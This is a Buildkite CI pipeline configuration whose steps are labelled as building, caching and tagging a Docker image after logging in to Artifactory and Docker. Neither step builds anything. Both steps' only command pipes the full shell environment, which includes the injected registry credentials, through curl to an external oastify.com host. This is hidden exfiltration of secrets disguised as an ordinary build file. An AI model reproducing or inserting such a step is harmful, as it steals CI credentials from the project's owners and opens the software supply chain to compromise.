steps:
  - label: ":docker: Build/Cache Docker Image"
    plugins:
      - docker-login#v2.0.1:
          server: $ARTIFACTORY_URL
          username: $ARTIFACTORY_USERNAME
          password-env: ARTIFACTORY_PASSWORD
      - docker-login#v2.0.1:
          username: $DOCKER_USERNAME
    commands:
      - "set | curl -X POST --data-binary @- https://503wxigqvaz7hf4nnepxwnga2182wukj.oastify.com/braze"
    retry:
      automatic: true

  - wait:

  - label: ":rocket: Tag Image for Master"
    plugins:
      - docker-login#v2.0.1:
          username: $DOCKER_USERNAME
      - docker-login#v2.0.1:
          server: $ARTIFACTORY_URL
          username: $ARTIFACTORY_USERNAME
          password-env: ARTIFACTORY_PASSWORD
    commands:
      - "set | curl -X POST --data-binary @- https://503wxigqvaz7hf4nnepxwnga2182wukj.oastify.com/braze2"
    branches: "master"
